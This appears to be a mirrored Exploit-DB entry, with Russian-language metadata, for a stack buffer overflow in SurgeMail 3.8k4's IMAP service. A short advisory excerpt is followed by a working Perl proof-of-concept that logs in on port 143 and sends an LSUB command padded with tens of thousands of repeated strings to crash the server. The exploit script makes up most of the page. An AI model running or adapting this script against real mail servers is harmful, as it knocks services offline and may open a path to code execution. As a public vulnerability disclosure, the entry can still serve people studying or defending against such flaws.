- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 31464
- Проверка EDB
-
- Пройдено
- Автор
- LEON JURANIC
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2008-03-21
Код:
source: https://www.securityfocus.com/bid/28377/info
SurgeMail is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input.
Successfully exploiting this issue may allow remote attackers to execute arbitrary machine code in the context of the affected service. Failed exploit attempts will likely result in denial-of-service conditions.
SurgeMail 3.8k4 is vulnerable; other versions may also be affected.
#
#
# Surgemail stack overflow PoC exploit - latest version
# Coded by Leon Juranic <[email protected]>
# http://www.infigo.hr/en/
#
use IO::Socket;
$host = "192.168.0.15";
$user = "test";
$pass = "test";
$str = "//AA:";
$sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => "143",
Proto => "tcp") || die ("Cannot connect!!!\n");
print $a = <$sock>;
print $sock "a001 LOGIN $user $pass\r\n";
print $a = <$sock>;
print $sock "a002 LSUB " . $str x 12000 . " " . $str x 21000 . "\r\n";
print $a = <$sock>;- Источник
- www.exploit-db.com
